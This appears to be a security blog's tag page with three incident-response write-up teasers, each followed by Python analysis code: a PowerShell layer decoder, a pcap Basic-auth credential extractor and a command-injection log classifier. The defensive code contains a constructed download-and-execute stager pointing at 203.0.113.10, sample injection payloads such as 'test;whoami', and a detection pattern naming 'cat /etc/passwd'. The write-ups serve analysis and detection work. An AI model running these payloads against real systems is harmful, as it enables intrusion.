Posts for: #Http

GothamLegend Incident Response – PowerShell Malware Analysis

Scenario
Recently the networks of a large company named GothamLegend were compromised after an employee opened a phishing email containing malware. The damage caused was critical and resulted in business-wide disruption. GothamLegend had to reach out to a third-party incident response team to assist with the investigation. You are a member of the IR team; all you have is an encoded PowerShell script. Can you decode it and identify what malware is responsible for this attack?
[Read more]
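The teaser does not say how the script was encoded, so the following is an added example rather than the post's own solution: it assumes the most common layering, the base64-over-UTF-16LE form that powershell.exe -EncodedCommand accepts, wrapping a gzip or deflate stage passed through [Convert]::FromBase64String. The two-stage stager and the 203.0.113.10 URL are constructed for illustration and are not the GothamLegend artifact.

```python
import base64
import gzip
import re
import zlib
from typing import List, Optional

# Loader idiom seen in many PowerShell droppers: a base64 blob handed to
# [Convert]::FromBase64String(...) and then through a Gzip or Deflate stream.
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(b64: str) -> str:
    """Undo the outer layer: -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def peel(layer: str) -> Optional[str]:
    """Return the next inner script if this layer embeds a base64 blob, else None."""
    m = B64_ARG.search(layer)
    if not m:
        return None
    data = base64.b64decode(m.group(1))
    if "GzipStream" in layer:
        data = gzip.decompress(data)
    elif "DeflateStream" in layer:
        data = zlib.decompress(data, -15)          # raw DEFLATE, no zlib header
    # StreamReader defaults to UTF-8; some stagers emit UTF-16LE instead
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return data.decode("utf-16-le")


def decode_layers(encoded_command: str, max_layers: int = 10) -> List[str]:
    """Peel layers until no further base64 stage is found (bounded to avoid loops)."""
    layers = [decode_encoded_command(encoded_command)]
    while len(layers) < max_layers:
        nxt = peel(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def extract_urls(script: str) -> List[str]:
    """Pull candidate download/C2 URLs out of a decoded layer."""
    return sorted(set(URL_RE.findall(script)))


# Constructed sample (assumption, not the GothamLegend script): a two-stage gzip stager.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/update.ps1')"


def build_sample() -> str:
    gz = base64.b64encode(gzip.compress(STAGE2.encode())).decode()
    stage1 = ("$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + gz + "'));"
              "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
              "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
    return base64.b64encode(stage1.encode("utf-16-le")).decode()


if __name__ == "__main__":
    layers = decode_layers(build_sample())
    for i, layer in enumerate(layers):
        print(f"--- layer {i} ---\n{layer}")
    print("URLs:", extract_urls(layers[-1]))
```

Each layer is kept rather than only the innermost one, because the loader code in the outer layers (stream type, IEX vs. Invoke-Expression, process hollowing helpers) is often what ties the sample to a known malware family.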

LetsDefend HTTP Basic Authentication Analysis – PCAP Investigation

Description
In this challenge, we receive a log indicating a possible web-based attack. The objective is to analyze the provided PCAP file and extract meaningful information about HTTP activity and authentication.
Investigation Process
Recovering the PCAP File
The PCAP was initially only available inside a VM, from which I copied the files out. The following commands were used to transfer the files out of the VM; since there was not much network traffic, the capture file was small:
[Read more]
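As an added example, not the post's own commands or the LetsDefend capture: a dependency-free Python parser that walks a classic pcap (Ethernet/IPv4/TCP), finds HTTP requests carrying an Authorization: Basic header, decodes the user-id:password pair, and counts distinct passwords per source and username so a brute-force pattern stands out. The capture it runs on is built in memory from constructed packets (10.0.0.5 against 10.0.0.80, an invented host name and credentials); checksums are zeroed, which a parser does not need.

```python
import base64
import binascii
import re
import struct
from typing import Dict, Iterator, List, Tuple

REQ_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/\d\.\d", re.M)
AUTH_RE = re.compile(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.M | re.I)


def iter_tcp_payloads(pcap: bytes) -> Iterator[Tuple[str, int, str, int, bytes]]:
    """Yield (src, sport, dst, dport, payload) for each TCP segment in a classic pcap."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    if magic == 0xA1B2C3D4:
        e = "<"                                   # little-endian file
    elif magic == 0xD4C3B2A1:
        e = ">"                                   # big-endian file
    else:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    if struct.unpack_from(e + "I", pcap, 20)[0] != 1:
        raise ValueError("only Ethernet (linktype 1) captures are handled")
    off = 24                                      # skip the 24-byte global header
    while off + 16 <= len(pcap):
        incl_len = struct.unpack_from(e + "IIII", pcap, off)[2]
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 54 or frame[12:14] != b"\x08\x00":
            continue                              # too short or not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:
            continue                              # not TCP
        total = struct.unpack_from("!H", ip, 2)[0]
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        doff = (tcp[12] >> 4) * 4
        yield src, sport, dst, dport, tcp[doff:]


def extract_basic_auth(pcap: bytes) -> List[Dict[str, str]]:
    """Decode every Basic credential in the capture, one record per request."""
    findings = []
    for src, sport, dst, dport, payload in iter_tcp_payloads(pcap):
        m = AUTH_RE.search(payload)
        if not m:
            continue
        try:
            creds = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except binascii.Error:
            continue                              # malformed header, skip it
        user, _, pw = creds.partition(":")        # RFC 7617: user-id ":" password
        req = REQ_LINE.search(payload)
        findings.append({
            "src": f"{src}:{sport}", "dst": f"{dst}:{dport}",
            "method": req.group(1).decode() if req else "?",
            "path": req.group(2).decode() if req else "?",
            "username": user, "password": pw,
        })
    return findings


def attempts_per_user(findings: List[Dict[str, str]]) -> Dict[Tuple[str, str], int]:
    """Distinct passwords tried per (source IP, username); several suggests brute force."""
    seen: Dict[Tuple[str, str], set] = {}
    for f in findings:
        seen.setdefault((f["src"].split(":")[0], f["username"]), set()).add(f["password"])
    return {k: len(v) for k, v in seen.items()}


# Constructed sample capture (assumption, not the LetsDefend PCAP): two requests, one reply.
def _frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame; checksums are zeroed, which is fine for offline parsing."""
    ip4 = lambda a: bytes(int(o) for o in a.split("."))
    eth = bytes(12) + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0, ip4(src), ip4(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 0xFFFF, 0, 0)
    return eth + ip + tcp + payload


def build_sample_pcap() -> bytes:
    frames = []
    for creds, path in ((b"admin:password", b"/admin"), (b"admin:S3cr3t!", b"/admin/config")):
        body = (b"GET " + path + b" HTTP/1.1\r\nHost: intranet.example\r\n"
                b"Authorization: Basic " + base64.b64encode(creds) + b"\r\n\r\n")
        frames.append(_frame("10.0.0.5", "10.0.0.80", 51000, 80, body))
    frames.append(_frame("10.0.0.80", "10.0.0.5", 80, 51000,
                         b"HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"admin\"\r\n\r\n"))
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, fr in enumerate(frames):
        out += struct.pack("<IIII", 1646021520 + i, 0, len(fr), len(fr)) + fr
    return out


if __name__ == "__main__":
    found = extract_basic_auth(build_sample_pcap())
    for f in found:
        print(f)
    print(attempts_per_user(found))
```

On a real capture, replace build_sample_pcap() with open(path, "rb").read(); the same check is `tshark -r file.pcap -Y http.authbasic -T fields -e ip.src -e http.authbasic` when Wireshark is available, and the parser above is the fallback on a host without it. Note that it only looks at single segments, so a request whose headers span two TCP segments needs stream reassembly first.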

LetsDefend SOC168 – Command Injection (whoami) Web Attack Analysis

Alert Name: SOC168 – Whoami Command Detected in Request Body
Severity: High
Event ID: 118
Event Time: Feb 28, 2022, 04:12 AM
Category: Web Attack
Play Book
1. Alert Overview
A high-severity web attack alert was triggered on WebServer1004 due to the detection of the whoami command within the HTTP request body. This behavior is commonly associated with command injection attempts, where an attacker tries to execute system-level commands through a web application.
[Read more]
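As an added example, not the SOC168 playbook's own logic: a Python classifier that URL-decodes request bodies (including double encoding), rates a recon command chained with shell metacharacters as high, a bare whoami token that may just be text as low, and ignores the word as an ordinary form-field name such as id=5. The log lines, IPs and paths it runs over are constructed for illustration and are not LetsDefend data.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Recon commands attackers usually try first, and the shell glue used to chain them.
COMMANDS = r"(?:whoami|id|uname(?:\s+-a)?|hostname|cat\s+/etc/passwd|ipconfig|net\s+user)"
META = r"(?:;|\|\|?|&&?|`|\$\(|\n)"
# (?!=) after the command keeps form fields like "&id=5" from counting as injection.
CHAIN_RE = re.compile(META + r"\s*(" + COMMANDS + r")\b(?!=)", re.I)   # glue + command: high
BARE_RE = re.compile(r"\b(" + COMMANDS + r")\b(?!=)", re.I)              # command alone: low


def decode_body(body: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%2524 -> %24 -> $) are caught."""
    for _ in range(rounds):
        decoded = unquote_plus(body)
        if decoded == body:
            break
        body = decoded
    return body


def analyze_body(body: str) -> Dict[str, str]:
    """'high' = command chained with shell glue, 'low' = command token only
    (worth a look, often benign text), 'none' = nothing suspicious."""
    decoded = decode_body(body)
    m = CHAIN_RE.search(decoded)
    if m:
        return {"severity": "high", "decoded": decoded, "match": m.group(0)}
    m = BARE_RE.search(decoded)
    if m:
        return {"severity": "low", "decoded": decoded, "match": m.group(0)}
    return {"severity": "none", "decoded": decoded, "match": ""}


# Constructed log lines (tab-separated: time, src, method, path, body); not LetsDefend data.
SAMPLE_LOG = """\
2022-02-28T04:09:00Z\t192.0.2.15\tPOST\t/item\tuser=bob&id=5
2022-02-28T04:10:01Z\t192.0.2.15\tPOST\t/login\tusername=test&password=test
2022-02-28T04:11:30Z\t192.0.2.15\tPOST\t/login\tusername=test;whoami&password=x
2022-02-28T04:12:00Z\t192.0.2.15\tPOST\t/search\tq=%60whoami%60
2022-02-28T04:12:05Z\t192.0.2.15\tPOST\t/search\tq=%2524%2528whoami%2529
2022-02-28T04:13:00Z\t198.51.100.7\tPOST\t/comment\ttext=whoami-tool-review+is+out
2022-02-28T04:14:00Z\t198.51.100.7\tPOST\t/search\tq=my+identity"""


def triage(log: str) -> List[Dict[str, str]]:
    """Run the classifier over each log line and keep everything that is not 'none'."""
    hits = []
    for line in log.splitlines():
        ts, src, method, path, body = line.split("\t", 4)
        verdict = analyze_body(body)
        if verdict["severity"] != "none":
            hits.append({"time": ts, "src": src, "method": method, "path": path, **verdict})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(h["severity"].upper(), h["time"], h["src"], h["path"], repr(h["match"]))
```

The severity split is the point: a whoami string on its own is a reason to look, but a metacharacter in front of it (; | & ` $( or an encoded newline) is what turns a harmless field value into an injection attempt, and decoding before matching is what keeps %60 and %2524-style evasions from slipping past the rule.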